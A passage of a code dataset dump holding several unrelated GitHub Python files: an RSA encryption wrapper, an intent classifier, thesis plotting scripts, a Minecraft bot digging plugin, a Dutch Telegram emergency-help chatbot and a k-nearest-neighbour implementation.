4)\n","repo_name":"zhr1996/Emulating-Chord-Peer-to-Peer-Hash-Tables","sub_path":"part_2.py","file_name":"part_2.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"32132399242","text":"from CipherInterface import CipherInterface\nfrom Crypto.Cipher import PKCS1_OAEP\nimport Crypto.PublicKey.RSA\nfrom Crypto.Random import get_random_bytes\n\nclass RSA(CipherInterface):\n\tdef __init__(self):\n\t\tself.keystring = \"\"\n\n\tdef setKey(self, keyfilestring):\n\t\tf = open(keyfilestring, 'r')\n\t\tKey = f.read()\n\t\tif not Key:\n\t\t\treturn False\n\n\t\tprint(Key)\n\t\tself.keystring = Crypto.PublicKey.RSA.importKey(Key)\n\n\n\t\treturn True\n\n\tdef encrypt(self, plaintext):\n\t\tCHUNK_SIZE = 214 #amount to encrypt at a time\n\t\tciphertext= b\"\"\n\t\tcipher = PKCS1_OAEP.new(self.keystring)\n\t\tplaintext = bytes(plaintext, encoding=\"ascii\") #converts to byte string\n\t\tfor x in range(0, len(plaintext), CHUNK_SIZE):\n\t\t\tciphertext += cipher.encrypt(plaintext[x:x+CHUNK_SIZE])\n\n\t\treturn ciphertext\n\n\n\tdef decrypt(self, ciphertext):\n\t\tCHUNK_SIZE = 256 #amount to decrypt at a time\n\t\tplaintext= b\"\"\n\t\tcipher = PKCS1_OAEP.new(self.keystring)\n\t\t# plaintext += cipher.decrypt(ciphertext)\n\t\tfor x in range(0, len(ciphertext), CHUNK_SIZE):\n\t\t\tplaintext += cipher.decrypt(ciphertext[x:x+CHUNK_SIZE])\n\t\treturn plaintext","repo_name":"ImWayGooderest/Cryptography-Project-2-Python","sub_path":"RSA.py","file_name":"RSA.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18022203228","text":"from utils import query, FINE_TUNED\nfrom data_classes.intents import INTENTS\n\nAPI_URL = \"https://api-inference.huggingface.co/models/facebook/bart-large-mnli\"\nif FINE_TUNED:\n from transformers import pipeline\n\nclass IntentClassifier:\n \"\"\"Classifies Intent\"\"\"\n\n def __init__(self):\n if FINE_TUNED:\n self.clf = pipeline(\n task='zero-shot-classification', \n model='facebook/bart-large-mnli',\n multi_label=True\n )\n\n def classify_intent(self, text):\n print(\"classifying intent\")\n if FINE_TUNED:\n return self.clf(text, INTENTS)\n\n payload = {\n \"inputs\": text,\n \"parameters\": {\"candidate_labels\": INTENTS},\n }\n\n return query(payload, API_URL)\n","repo_name":"alanb43/HearSay","sub_path":"intent_classifier.py","file_name":"intent_classifier.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"15321354459","text":"from morse_pf import *\nplt.style.use('paper')\n\n\ndef morse_potential(r, d_e, nu, r_e ):\n a = np.sqrt(m * (2.0 * np.pi * nu) ** 2 / (2.0 * d_e))\n return d_e * (1.0 - np.exp(-a * (r - r_e)))**2\n\n\ndef ho_potential(r, nu, r_e):\n return 0.5 * m * (2.0 * np.pi * nu)**2 * (r - r_e)**2\n\n\ndef qunatum(nus_hz):\n\n entropies = []\n\n for nu in nus_hz:\n h_nu_over_kb_t = (h * nu) / (kb * t)\n s = r * (h_nu_over_kb_t / (np.exp(h_nu_over_kb_t) - 1.0) - np.log(1.0 - np.exp(- h_nu_over_kb_t)))\n entropies.append(s)\n\n return plt.plot(nus, entropies, label='quantum', c='#1f77b4')\n\n\ndef classical(nus_hz):\n\n classical_entropies = []\n\n for nu in nus_hz:\n h_nu_over_kb_t = (h * nu) / (kb * t)\n s_clasical = r * (np.log(np.exp(1) / h_nu_over_kb_t))\n classical_entropies.append(s_clasical)\n\n return plt.plot(nus, classical_entropies, label='HO', c='#ff7f0e')\n\n\ndef truncated_classical(nus_hz):\n\n classical_entropies = []\n\n def z(nu):\n return ((np.pi * kb * t / (4.0 * h * nu)) * special.erfc(-r_e * np.sqrt(beta / (2.0 * m))) *\n special.erfc(-r_e * np.sqrt(beta * m * (2.0 * np.pi * nu)**2 / (2.0 * m)))) # nu = omega / 2 pi\n\n def dZ_dT(nu):\n a = r_e**2 / (2.0 * kb * m)\n b = r_e**2 * m * (2.0 * np.pi * nu)**2 / (2.0 * kb)\n term0 = special.erfc(-np.sqrt(a/t)) * special.erfc(-np.sqrt(b/t))\n term1 = (b * np.exp(-b / t) * special.erfc(-np.sqrt(a/t))) / (np.sqrt(b * np.pi * t))\n term2 = (a * np.exp(-a / t) * special.erfc(-np.sqrt(b/t))) / (np.sqrt(a * np.pi * t))\n\n return (kb / (4.0 * h * nu)) * (term0 + term1 + term2)\n\n for nu in nus_hz:\n pf = z(nu)\n s_clasical = r * (t * (1.0 / pf) * dZ_dT(nu) + np.log(pf))\n classical_entropies.append(s_clasical)\n\n return plt.plot(nus, classical_entropies, label='trunc. HO', c='#2ca02c')\n\n\ndef morse_classical(nus_hz):\n\n classical_entropies = []\n\n def dZ_dT(nu, temp):\n\n dt = 1E-8\n return (morse_pf(d_e, nu, kb, temp + dt, h, m) - morse_pf(d_e, nu, kb, temp, h, m)) / dt\n\n for nu in nus_hz:\n pf = morse_pf(d_e, nu, kb, t, h, m)\n s_clasical = r * (t * (1.0 / pf) * dZ_dT(nu, t) + np.log(pf))\n classical_entropies.append(s_clasical)\n\n return plt.plot(nus, classical_entropies, label='Morse', c='#d62728')\n\n\ndef plot(nus_hz):\n # qunatum(nus_hz)\n classical(nus_hz)\n truncated_classical(nus_hz)\n morse_classical(nus_hz)\n\n plt.plot(np.linspace(-200, 5000, 10), np.zeros(10), ls='--', c='k')\n plt.xlabel('$\\\\nu$ / cm$^{-1}$')\n plt.ylabel('$S$ / J K$^{-1}$ mol$^{-1}$')\n plt.ylim(-20)\n plt.xlim([-22, 3000])\n plt.legend()\n\n return plt.show()\n\n\nif __name__ == '__main__':\n\n nus = np.linspace(0.1, 3000, 100)\n c_cm = 2.998E10 # cm s-1\n m_to_ang = 1E10 # A m-1\n nus_hz = nus * c_cm\n\n kb = 1.38064852E-23 # J K-1\n na = 6.0221409E23 # mol-1\n r = 8.3144598 # J K-1 mol-1\n h = 6.62607004E-34 # J s\n t = 298.15 # K\n beta = 1.0 / (kb * t) # J-1\n\n r_e = 1E-10 # 1 Å\n m = 1.6605E-27 # kg\n\n d_e = 400 * 1000 / na # J\n\n # plot(nus_hz)\n\n nu = 2000 * c_cm\n xs = np.linspace(-1.5E-10, 4E-10, 500)\n ys_ho = np.array([ho_potential(x, nu, r_e=0.0) for x in xs])\n ys_ho_trunc = np.array([ho_potential(x, nu, r_e=0.0) if x > -r_e else 1E10 for x in xs])\n ys_morse = np.array([morse_potential(x, d_e, nu, r_e=0.0) for x in xs])\n\n plt.plot(xs * m_to_ang, 1E18 * ys_ho, c='#ff7f0e', ls='--')\n plt.plot(xs * m_to_ang, 1E18 * ys_ho_trunc, c='#2ca02c')\n plt.xlabel('x / Å')\n plt.ylabel('V(x) / $\\\\times 10^{-18}\\;$ J')\n plt.ylim([0.0, 2.0])\n plt.show()\n plt.plot(xs * m_to_ang, 1E18 * ys_ho, c='#ff7f0e', ls='--')\n plt.plot(xs * m_to_ang, 1E18 * ys_morse, c='#d62728')\n plt.xlabel('x / Å')\n plt.ylabel('V(x) / $\\\\times 10^{-18}\\;$ J')\n plt.ylim([0.0, 2.0])\n plt.show()\n","repo_name":"t-young31/thesis","sub_path":"4/figs/fig_s_vs_nu/old/s_vs_nu.py","file_name":"s_vs_nu.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"70168941377","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 21 12:49:05 2015\nread 'onset' data ,and plot graph of time and temp\n@author: hxu\n\"\"\"\nfrom pandas import *\nimport xlrd #to read xlrd\nfrom dateutil.parser import parse\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as md\n\npath = \"SN 10708774 2015-04-21 12:27:55 -0400.xlsx\"\nbook = xlrd.open_workbook(path)\nlocation=book.sheet_by_index(2).row_slice(rowx=11,\n start_colx=3,\n end_colx=4)\nlocation=str(location[0])[5:]\nlat1=int(location[2:4]) #convert lat lon to XX.XXXX\nlat2=int(location[8:10])/60.0\nlat3=int(location[11:13])/3600.0\nlon1=-int(location[16:18])\nlon2=-int(location[22:24])/60.0\nlon3=-int(location[-5:-3])/3600.0\nlat=round(lat1+lat2+lat3,4)\nlon=round(lon1+lon2+lon3,4)\nf='SN 10708774 2015-04-21 12:27:55 -0400.csv'\nvariables=['datetime','temp','1','2','3','4','5']\nskipr=3 #get rid of first 8 rows\ndt=read_csv(f,sep=',',date_parser=parse,skiprows=skipr,names=variables) #read minilog data\ndt=dt.drop(dt.index[[-1]])\ntime_ori=dt['datetime'].tolist()\n\nimport datetime\ntime_ori=[(datetime.datetime.strptime(str(q),'%Y-%m-%d %H:%M:%S')) for q in time_ori] #time transition\n#datetime.datetime.fromtimestamp(). strptime('%Y-%m-%d %H:%M:%S')\ntemp_ori=dt['temp'].tolist()\n\nfig=plt.figure() #set figure\nax=fig.add_subplot(111)\nax.plot(time_ori,temp_ori,label='HOBE',linewidth=3, color='r')\n\nax.set_ylabel('Temperature(F)',fontsize=18) #plot\nxfmt = md.DateFormatter('%Y-%m-%d %H:%M') #set plot time axis format\nax.xaxis.set_major_formatter(xfmt)\nax.legend()\nplt.gcf().autofmt_xdate() #beautify time axis\nplt.title('On coordinate: '+str(lat)+' '+str(lon),fontsize=25)\n#df1.plot(x='time',y='temp_cur')\nplt.show()\nplt.savefig('test'+'.png') #save file","repo_name":"xhx509/telemetered_temperature","sub_path":"hobe.py","file_name":"hobe.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6386091820","text":"from datetime import datetime\nimport pytz\nclass Account:\n\tdef __init__(self, name, balance):\n\t\tself.name = name\n\t\tself.balance = balance\n\t\tself.history = []\n\n\n\t@staticmethod\n\tdef _get_time():\n\t\treturn pytz.utc.localize(datetime.utcnow()).astimezone().isoformat()\n\t\t\n\n\tdef deposit(self, amount):\n\t\tself.balance +=amount\n\t\tself.show_balance()\n\t\tself.history.append([amount,self._get_time()])\n\n\tdef withdraw(self, amount):\n\t\tif self.balance > amount:\n\t\t\tself.balance -= amount\n\t\t\tprint(f'You spend {amount} units')\n\t\t\tself.history.append([-amount,self._get_time()])\n\n\t\t\tself.show_balance()\n\t\telse:\n\t\t\tprint('not money')\n\t\t\tself.show_balance()\n\n\tdef show_balance(self):\n\t\tprint(f'You balance {self.balance}')\n\n\tdef show_histore(self):\n\t\tfor amount, date in self.history:\n\t\t\tif amount >0:\n\t\t\t\ttransaction = 'deposit'\n\t\t\telse:\n\t\t\t\ttransaction = 'withdraw'\n\t\t\tprint(f'{amount} {transaction} {date}\\t')\n\n\n\na = Account('Nikolay',0)\nb = Account('Vita',0)\n\n","repo_name":"minc84/learn","sub_path":"trenning.py","file_name":"trenning.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"31343860544","text":"# _*_ coding: utf-8 _*_\n\nBATCH_SIZE = 64\nEMB_SIZE = 50\nMAX_CHAR_LEN = 100\nMAX_LEXICON_WORDS_NUM = 5\nNUM_UNITS = 128\nNUM_TAGS = 18\nLEARNING_RATE = 0.005\nCLIP = 5\nOPTIMIZER = 'adam'\nGAZ_FILE = 'data/ctb.50d.vec'\nCHAR_EMB = 'data/gigaword_chn.all.a2b.uni.ite50.vec'\nTRAIN_FILE = 'data/demo.train.char'\nDEV_FILE = 'data/demo.dev.char'\nTEST_FILE = 'data/demo.test.char'\nMODEL_SAVE_PATH = 'model/ckpt'\n","repo_name":"lyssym/NER-toolkits","sub_path":"tf_kit/lattice/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"38927780326","text":"import sys\nfrom sys import version_info\n\nimport numpy as np\nfrom os.path import dirname, abspath\n\nsys.dont_write_bytecode = True\n\nif __name__ == '__main__' and __package__ is None:\n parent_dir = dirname(dirname(abspath(__file__)))\n sys.path.append(parent_dir)\n\nif version_info.major > 2:\n from neuropredict.utils import balanced_accuracy\nelse:\n raise NotImplementedError('neuropredict supports only Python 3+.')\n\n\ndef test_balanced_accuracy():\n \"\"\"Tests ensure the accuracy of accuracy calculations!\"\"\"\n\n num_trials = 10\n\n for num_classes in np.random.randint(2, 100, num_trials):\n cm_100 = np.zeros((num_classes, num_classes), int)\n # no errors! sizes are imbalanced\n np.fill_diagonal(cm_100, np.random.randint(10, 100, num_classes))\n if not np.isclose(balanced_accuracy(cm_100), 1.0):\n raise ArithmeticError('accuracy calculations on perfect classifier '\n 'does not return 100% accuracy!!')\n\n cm_100perc_wrong = np.random.randint(10, 100, (num_classes, num_classes))\n # ALL errors! sizes are imbalanced\n np.fill_diagonal(cm_100perc_wrong, 0.0)\n if not np.isclose(balanced_accuracy(cm_100perc_wrong), 0.0):\n raise ArithmeticError('accuracy calculations on 100% wrong classifier '\n 'does not return 0% accuracy!!')\n\n cm = np.random.randint(10, 100, (num_classes, num_classes)).astype('float64')\n np.fill_diagonal(cm, 0)\n class_sizes_without_diag_elemeent = cm.sum(axis=1)\n chosen_accuracy = np.round(np.random.rand(num_classes), decimals=3)\n factor = chosen_accuracy / (1.0 - chosen_accuracy)\n # filling the diag in order to reach certain level of chosen accuracy\n diag_values = np.around(class_sizes_without_diag_elemeent * factor).astype('float64')\n np.fill_diagonal(cm, diag_values)\n computed_acc = balanced_accuracy(cm)\n expected_acc = np.mean(chosen_accuracy)\n if not np.isclose(computed_acc, expected_acc, atol=1e-4):\n raise ArithmeticError('accuracy calculations do not match the expected!!\\n'\n ' Expected : {:.8f}\\n'\n ' Estimated: {:.8f}\\n'\n ' Differ by: {:.8f}\\n'.format(expected_acc, computed_acc,\n expected_acc - computed_acc))\n\n\ntest_balanced_accuracy()\n","repo_name":"smlacava/neuropredict","sub_path":"neuropredict/tests/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"3540077199","text":"# coding=utf-8\nimport dropbox #Dropobxのファイルをいじる\nfrom PIL import Image #画像データの編集をする\nimport tempfile\n\n#自分のdropboxアカウントと接続\naccesskey=''\ndbx = dropbox.Dropbox(accesskey)\ndbx.users_get_current_account()\nimagepath='/カメラアップロード'\n#ファイル一覧を出力\nfor entry in dbx.files_list_folder(imagepath).entries:\n print(entry.name)\n if entry.name[-4:] == '.png':\n with tempfile.TemporaryDirectory() as dname:\n print(dname)\n dbx.files_download_to_file(dname,imagepath+'/'+entry.name)\n","repo_name":"gurencrize/crizeimagechanger","sub_path":"crizeimagechanger.py","file_name":"crizeimagechanger.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74240542335","text":"import asyncio\nimport time\nfrom typing import Union\n\nclass Vec3:\n def __init__(self, x: float, y: float, z: float):\n self.x = x\n self.y = y\n self.z = z\n\n def offset(self, x: float, y: float, z: float):\n return Vec3(self.x + x, self.y + y, self.z + z)\n\n def distance_to(self, other):\n dx = self.x - other.x\n dy = self.y - other.y\n dz = self.z - other.z\n return (dx * dx + dy * dy + dz * dz) ** 0.5\n\nclass Block:\n def __init__(self, position: Vec3, diggable: bool):\n self.position = position\n self.diggable = diggable\n\ndef inject(bot):\n\n swing_interval = None\n wait_timeout = None\n\n digging_task = None\n bot.target_dig_block = None\n bot.last_dig_time = None\n\n async def dig(block: Block, force_look=False, dig_face: Union[str, Vec3] = 'auto'):\n nonlocal digging_task\n\n if block is None:\n raise ValueError('dig was called with an undefined or null block')\n\n if dig_face is None or isinstance(dig_face, Vec3):\n dig_face = 'auto'\n\n if bot.target_dig_block:\n bot.stop_digging()\n\n digging_face = 1 # Default (top)\n\n if force_look != 'ignore':\n if isinstance(dig_face, Vec3):\n if dig_face.x:\n digging_face = BlockFaces.EAST if dig_face.x > 0 else BlockFaces.WEST\n elif dig_face.y:\n digging_face = BlockFaces.TOP if dig_face.y > 0 else BlockFaces.BOTTOM\n elif dig_face.z:\n digging_face = BlockFaces.SOUTH if dig_face.z > 0 else BlockFaces.NORTH\n await bot.look_at(\n block.position.offset(0.5, 0.5, 0.5).offset(dig_face.x * 0.5, dig_face.y * 0.5, dig_face.z * 0.5),\n force_look\n )\n elif dig_face == 'raycast':\n dx = bot.entity.position.x - (block.position.x + 0.5)\n dy = bot.entity.position.y + bot.entity.height - (block.position.y + 0.5)\n dz = bot.entity.position.z - (block.position.z + 0.5)\n\n visible_faces = {\n 'y': int(abs(dy) > 0.5),\n 'x': int(abs(dx) > 0.5),\n 'z': int(abs(dz) > 0.5)\n }\n\n valid_faces = []\n for face, visible in visible_faces.items():\n if not visible:\n continue\n\n target_pos = block.position.offset(\n 0.5 + (visible_faces['x'] * 0.5 if face == 'x' else 0),\n 0.5 + (visible_faces['y'] * 0.5 if face == 'y' else 0),\n 0.5 + (visible_faces['z'] * 0.5 if face == 'z' else 0)\n )\n\n start_pos = bot.entity.position.offset(0, bot.entity.height, 0)\n ray_block = bot.world.raycast(start_pos, target_pos.minus(start_pos).normalize(), 5)\n if ray_block:\n ray_pos = ray_block.position\n if ray_pos.x == block.position.x and ray_pos.y == block.position.y and ray_pos.z == block.position.z:\n valid_faces.append({\n 'face': ray_block.face,\n 'target_pos': ray_block.intersect\n })\n\n if valid_faces:\n closest = None\n dist_sqrt = 999\n for valid_face in valid_faces:\n t_pos = valid_face['target_pos']\n c_dist = Vec3(t_pos.x, t_pos.y, t_pos.z).distance_to(\n bot.entity.position.offset(0, bot.entity.height, 0)\n )\n if dist_sqrt > c_dist:\n closest = valid_face\n dist_sqrt = c_dist\n\n await bot.look_at(closest['target_pos'], force_look)\n digging_face = closest['face']\n else:\n raise ValueError('Block not in view')\n else:\n await bot.look_at(block.position.offset(0.5, 0.5, 0.5), force_look)\n\n digging_task = asyncio.create_task(do_digging(block, digging_face))\n await digging_task\n\n async def do_digging(block: Block, digging_face: int):\n nonlocal swing_interval, wait_timeout, digging_task\n\n if swing_interval or wait_timeout:\n raise RuntimeError('Digging is already in progress')\n\n def finish_digging():\n nonlocal swing_interval, wait_timeout\n swing_interval = None\n wait_timeout = None\n\n if bot.target_dig_block:\n bot._client.write('block_dig', {\n 'status': 2, # finish digging\n 'location': bot.target_dig_block.position,\n 'face': digging_face # hard coded to always dig from the top\n })\n\n bot.target_dig_block = None\n bot.last_dig_time = time.perf_counter()\n\n def on_block_update(old_block, new_block):\n nonlocal swing_interval, wait_timeout, digging_task\n if new_block is None or new_block.type != 0:\n return\n\n bot.remove_listener('blockUpdate', on_block_update)\n if swing_interval:\n swing_interval.cancel()\n swing_interval = None\n\n if wait_timeout:\n wait_timeout.cancel()\n wait_timeout = None\n\n bot.target_dig_block = None\n bot.last_dig_time = time.perf_counter()\n\n digging_task.set_result(None)\n\n bot.target_dig_block = block\n bot._client.write('block_dig', {\n 'status': 0, # start digging\n 'location': block.position,\n 'face': digging_face # default face is 1 (top)\n })\n\n wait_time = dig_time(block)\n wait_timeout = asyncio.create_task(asyncio.sleep(wait_time))\n swing_interval = asyncio.create_task(do_swing_interval())\n\n bot.swing_arm()\n\n def do_swing_arm():\n bot.swing_arm()\n\n async def do_swing_interval():\n while True:\n do_swing_arm()\n await asyncio.sleep(0.35)\n\n bot.add_listener('blockUpdate', on_block_update)\n\n def stop_digging():\n nonlocal swing_interval, wait_timeout, digging_task\n\n if swing_interval:\n swing_interval.cancel()\n swing_interval = None\n\n if wait_timeout:\n wait_timeout.cancel()\n wait_timeout = None\n\n if bot.target_dig_block:\n bot._client.write('block_dig', {\n 'status': 1, # cancel digging\n 'location': bot.target_dig_block.position,\n 'face': 1 # hard coded to always dig from the top\n })\n\n block = bot.target_dig_block\n bot.target_dig_block = None\n bot.last_dig_time = time.perf_counter()\n\n bot.remove_listener('blockUpdate', on_block_update)\n bot.emit('diggingAborted', block)\n\n digging_task.cancel()\n\n def can_dig_block(block: Block):\n if not block or not block.diggable:\n return False\n\n return block.position.offset(0.5, 0.5, 0.5).distance_to(\n bot.entity.position.offset(0, 1.65, 0)\n ) <= 5.1\n\n def dig_time(block: Block):\n type_id = None\n enchantments = []\n\n currently_held_item = bot.held_item\n if currently_held_item:\n type_id = currently_held_item.type\n enchantments = currently_held_item.enchants\n\n head_equipment_slot = bot.get_equipment_dest_slot('head')\n head_equipped_item = bot.inventory.slots[head_equipment_slot]\n if head_equipped_item:\n helmet_enchantments = head_equipped_item.enchants\n enchantments.extend(helmet_enchantments)\n\n creative = bot.game.game_mode == 'creative'\n return block.dig_time(\n type_id,\n creative,\n bot.entity.is_in_water,\n not bot.entity.on_ground,\n enchantments,\n bot.entity.effects\n )\n\n async def look_at(position: Vec3, force_look):\n # Implement look_at logic\n pass\n\n # Constants from BlockFaces class\n class BlockFaces:\n EAST = 5\n WEST = 4\n TOP = 1\n BOTTOM = 0\n SOUTH = 3\n NORTH = 2\n\n bot.dig = dig\n bot.stop_digging = stop_digging\n bot.can_dig_block = can_dig_block\n bot.dig_time = dig_time\n\n bot.target_dig_block = None\n bot.last_dig_time = None\n bot.add_listener('death', lambda: stop_digging())\n","repo_name":"CoC-Fire/python-mineflayer","sub_path":"plugins/digging.py","file_name":"digging.py","file_ext":"py","file_size_in_byte":8761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"43324894679","text":"import sys\nfrom collections import deque\nn = int(sys.stdin.readline())\nqueue = []\nnumber = deque(range(1,n+1))\nwhile n > 1 :\n queue.append(number.popleft())\n number.append(number.popleft())\n n -= 1\nqueue.append(number.pop())\n\nfor i in range(len(queue)):\n print(queue[i], end=' ')","repo_name":"nuyggnoes/PythonNewbie","sub_path":"BaekJoon/BAEK_큐/2161.py","file_name":"2161.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9990960657","text":"import requests\r\n# Vervang de met uw identificatie code.\r\nurl = \"https://api.telegram.org/bot/\"\r\n\r\n\r\n# haalt chat id op\r\ndef get_chat_id(update):\r\n chat_id = update['message'][\"chat\"][\"id\"]\r\n return chat_id\r\n\r\n\r\n# haalt message text op\r\ndef get_message_text(update):\r\n message_text = update[\"message\"][\"text\"]\r\n return message_text\r\n\r\n\r\n# haalt de laatste last_update op\r\ndef last_update(req):\r\n response = requests.get(req + \"getUpdates\")\r\n response = response.json()\r\n result = response[\"result\"]\r\n total_updates = len(result) - 1\r\n return result[total_updates] # get last record message update\r\n\r\n\r\n# deze functie stuurt een bericht naar de gebruiker\r\ndef send_message(chat_id, message_text):\r\n params = {\"chat_id\": chat_id, \"text\": message_text}\r\n response = requests.post(url + \"sendMessage\", data=params)\r\n return response\r\n\r\n\r\ndef mainbot():\r\n update_id = last_update(url)[\"update_id\"]\r\n geldigelocaties = [\"meldkamer\", \"esso\", \"rotsoord\", \"lidl\", \"kinderopvang\", \"oranjebrug\",\r\n \"cafetaria 'Kleyne reick'\", \"mijdrechtstraat\", \"vondelbrug\", \"jutfaseweg\", \"mijdrechtstraat2\",\r\n \"roc\", \"grafisch lyceum utrecht\", \"balijelaan\", \"pizzeria toscana\", \"huisartsenpraktijk\",\r\n \"croesestraat\"]\r\n\r\n location = []\r\n hulp = []\r\n while True:\r\n update = last_update(url)\r\n if update_id == update[\"update_id\"]:\r\n # /start laat de bot beginnen\r\n if get_message_text(update).lower() == \"/start\":\r\n location.clear()\r\n hulp.clear()\r\n send_message(get_chat_id(update), 'Hallo mijn naam is Finn\\nWelke hulp heeft u nodig?\\n'\r\n 'U kunt kiezen uit 1: Politie, 2: Brandweer of 3: Medische hulp')\r\n\r\n # Checkt welke hulp de gebruiker nodig heeft\r\n elif get_message_text(update).lower() == \"politie\" or get_message_text(update).lower() == \"1\":\r\n hulp.clear()\r\n hulp.append(\"politie\")\r\n send_message(get_chat_id(update), \"U heeft gekozen voor politie.\\nWat is uw locatie?\")\r\n\r\n elif get_message_text(update).lower() == \"brandweer\" or get_message_text(update).lower() == \"2\":\r\n hulp.clear()\r\n hulp.append(\"brandweer\")\r\n send_message(get_chat_id(update), \"U heeft gekozen voor brandweer.\\nWat is uw locatie?\")\r\n\r\n elif get_message_text(update).lower() == \"medische hulp\" or get_message_text(update).lower() == \"3\":\r\n hulp.clear()\r\n hulp.append(\"medische hulp\")\r\n send_message(get_chat_id(update), \"U heeft gekozen voor medische hulp.\\nWat is uw locatie?\")\r\n\r\n # Als iemand eerst een locatie stuurt vraagt hij om de hulp.\r\n elif get_message_text(update).lower() in geldigelocaties and len(hulp) == 0:\r\n send_message(get_chat_id(update), \"Maak eerst een keuze wat voor hulp u wilt.\\n\"\r\n \"Kies uit 1: politie, 2: brandweer of 3: medische hulp.\\n\"\r\n \"let op spelling of gebruik de getallen\")\r\n location.clear()\r\n\r\n # De gebruiker heeft een de hulp en een locatie gekozen\r\n elif get_message_text(update).lower() in geldigelocaties and len(hulp) != 0:\r\n location.clear()\r\n location.append(get_message_text(update).lower())\r\n send_message(get_chat_id(update), \"De hulp die u nodig heeft is: \"\r\n + hulp[0] + \"\\nEn uw locatie is: \" + location[0]\r\n + \"\\nAls dit klopt typ dan: bevestig\")\r\n\r\n # Dit zorgt ervoor dat het alleen nut heeft om bevestig te typen als hij locatie en hulp heeft ingevuld.\r\n # Schrijft de opgegeven eindbestemming naar een txt file zodat locatie en hulp gewist kunnen worden voor\r\n # de volgende ronde.\r\n elif get_message_text(update).lower() == \"bevestig\":\r\n if len(geldigelocaties) != 0 and len(hulp) != 0:\r\n send_message(get_chat_id(update), \"De \" + hulp[0] + ' is onder weg naar ' + location[0])\r\n with open('Locatie.txt', 'w') as bestemming:\r\n bestemming.write(location[0])\r\n location.clear()\r\n hulp.clear()\r\n break\r\n\r\n # Checkt of de locatie goed geschreven is zodat het algoritme hem herkent.\r\n elif get_message_text(update).lower() not in geldigelocaties and len(hulp) != 0:\r\n send_message(get_chat_id(update), \"Dat is geen geldige locatie.\\nProbeer een andere en let op spelling.\")\r\n\r\n # Vraagt de gebruiker om geldige hulp in te vullen.\r\n else:\r\n send_message(get_chat_id(update), \"Ik begrijp het niet.\\n\"\r\n \"Kies uit 1: politie, 2: brandweer of 3: medische hulp.\\n\"\r\n \"let op spelling of gebruik de getallen\")\r\n\r\n update_id += 1\r\n","repo_name":"KaiterHorst/IPASS","sub_path":"Chatbot.py","file_name":"Chatbot.py","file_ext":"py","file_size_in_byte":5232,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"13467435957","text":"\"\"\"\nK-Nearest_Neighbour algorithm pytorch from scratch \nwhere you can either use 2-loops (inefficient), 1-loop (better)\nor a heavily vectorized zero-loop implementation.\n\nProgrammed by Shivam Chhetry\n* 06-08-2021\n\"\"\"\n\nimport numpy as np\n\nclass KNearestNeighbour:\n def __init__(self, k):\n self.k = k #\n self.eps = 1e-6 ## this is i'm using to make my calculation to be simple by adding small(chhotu) number\n \n def train(self, X, y):\n self.X_train = X\n self.Y_train = y\n \n def predict(self, X_test, num_loops=2):\n if num_loops == 0:\n distances = self.compute_distance_victorized(X_test)\n elif num_loops == 1:\n distances = self.compute_distance_one_loop(X_test)\n else:\n distances = self.compute_distance_two_loops(X_test)\n\n \n \n return self.predict_labels(distances)\n \n \n def compute_distance_two_loops(self, X_test):\n #Naive, inefficient way\n num_test = X_test.shape[0]\n num_train = self.X_train.shape[0]\n distances = np.zeros((num_test, num_train))\n \n for i in range(num_test):\n for j in range(num_train):\n distances[i,j] = np.sqrt(self.eps + np.sum((X_test[i, :] - self.X_train[j, :])**2))\n \n return distances \n \n def compute_distance_one_loop(self, X_test):\n \"\"\"\n Much better than two-loops but not as fast as fully vectorized version.\n\n \"\"\"\n num_test = X_test.shape[0]\n num_train = self.X_train.shape[0]\n distances = np.zeros((num_test, num_train))\n \n for i in range(num_test):\n distances[i,:] = np.sqrt(self.eps + np.sum((self.X_train - X_test[i,:])**2, axis=1))\n \n return distances\n \n def compute_distance_victorized(self, X_test):\n \n \n \"\"\"\n Idea: if we have two vectors a, b (two examples)\n and for vectors we can compute (a-b)^2 = a^2 - 2a (dot) b + b^2\n expanding on this and doing so for every vector lends to the \n heavy vectorized formula for all examples at the same time.\n \"\"\"\n \n \n #(X_test-X_train)^2 = (X_test^2 - 2*X_test*X_train + X_train^2)\n \n X_train_squared = np.sum(X_test**2, axis=1, keepdims=True)\n X_test_squared = np.sum(self.X_train**2, axis=1, keepdims=True)\n two_X_test_X_train = np.dot(X_test, self.X_train.T)\n \n # (Taking sqrt is not necessary: min distance won't change since sqrt is monotone)\n\n return np.sqrt(\n self.eps + X_test_squared -2*two_X_test_X_train + X_train_squared.T\n )\n \n \n \n \n def predict_labels(self, distances):\n num_test = distances.shape[0]\n y_pred = np.zeros(num_test)\n \n for i in range(num_test):\n y_indices = np.argsort(distances[i,:])\n k_closest_classes = self.Y_train[y_indices[:self.k]].astype(int)\n y_pred[i] = np.argmax(np.bincount(k_closest_classes))\n \n return y_pred\n \n \nif __name__ == \"__main__\":\n \n \"\"\"\n (X_test-X_train)^2 = (X_test^2 - 2*X_test*X_train + 